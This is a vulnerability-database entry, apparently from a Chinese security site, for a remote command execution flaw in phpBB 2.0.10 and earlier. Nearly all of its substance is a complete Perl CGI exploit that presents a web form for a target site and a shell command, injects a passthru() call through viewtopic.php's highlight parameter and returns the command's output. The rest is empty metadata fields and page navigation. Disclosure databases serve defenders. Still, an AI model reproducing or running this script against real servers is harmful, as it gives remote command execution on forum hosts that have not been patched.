phpBB <= 2.0.10 Remote Command Execution Exploit (cgi version)

基本字段

漏洞编号：: SSV-62934

披露/发现时间：: 未知

提交时间：: 2014-07-01

漏洞等级：

漏洞类别：: 其他类型

影响组件：

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.05KB

#!/usr/bin/perl #wphpbb.cgi #hack service:) #http://site/cgi-bin/wphpbb.cgi use CGI qw(:standard); $CGI::HEADERS_ONCE = 1; $CGI = new CGI; $atak = $CGI->param("atak"); $serv = $CGI->param("serv"); $dir = $CGI->param("dir"); $topic = $CGI->param("topic"); $cmd = $CGI->param("cmd"); print $CGI->header(-type=>'text/html',-charset=>'windows-1254'); print qq~<html><head> <meta http-equiv=Content-Type" content=text/html; charset=ISO-8859-9><title>phpBB HACK</title></head> <body bgcolor=black text=red>phpBB atak webscript<br> <font color=blue>exploit:by RusH security team // www.rst.void.ru<br> exploit update:ZzagorR</font><br> <table align=left><tr> <form action=? method=post> <input type=hidden name=atak value=phpbb> <td>Site: </td><td><input type=text name=serv value=$serv size=50><br><font color=blue>example: www.site.com</font></td></tr> <tr><td>Klasor: </td><td><input type=text name=dir value=$dir size=50><br><font color=blue>example: /phpBB2/</font></td></tr> <tr><td>TopicNo: </td><td><input type=text name=topic value=$topic size=10><br><font color=blue>example: 1</font></td></tr> <tr><td>Komut: </td><td><input type=text name=cmd value=$cmd size=100><br><font color=blue>example: id</font></td></tr> <tr><td colspan=2 align=center><input type=submit value="Test"></td></tr>~; if($atak eq "phpbb") { $serv =~ s/(http:\/\/)//eg; print "<tr><td valign=top colspan=2><font color=white> Sonuclar</font></td></tr>"; $cmd=~ s/(.*);$/$1/eg; $cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; $topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; $path = $dir; $path .= 'viewtopic.php?t='; $path .= $topic; $path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20'; $path .= $cmd; $path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F'; $path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; use IO::Socket; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECT FAILED\r\n"; print $socket "GET $path HTTP/1.1\n"; print $socket "Host: $serv\n"; print $socket "Accept: */*\n"; print $socket "Connection: close\n\n"; $on = 0; while ($answer = <$socket>) { if ($answer =~ /^_END_/) { print "<tr><td colspan=2 valign=top><font color=white>Islem Sonu</font></td></tr>\r\n"; exit(); } if ($on == 1) { print "<tr><td colspan=2 valign=top>$answer</td></tr>"; } if ($answer =~ /^_START_/) { $on = 1; } } print "[-] EXPLOIT BASARISIZ\r\n"; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; } print "</table></body></html>"; # milw0rm.com [2004-12-03]

共 3 兑换

参考链接

http://www.exploit-db.com/exploits/673

解决方案

临时解决方案

官方解决方案

防护方案

匿名兑换PoC
匿名兑换PoC
匿名兑换PoC

生命线

发现/披露了漏洞
2014-07-01 提交了漏洞
2014-07-01 提交补充了漏洞详情
2014-07-01 提交更新了 PoC

phpBB <= 2.0.10 Remote Command Execution Exploit (cgi version)

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

phpBB <= 2.0.10 Remote Command Execution Exploit (cgi version)

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定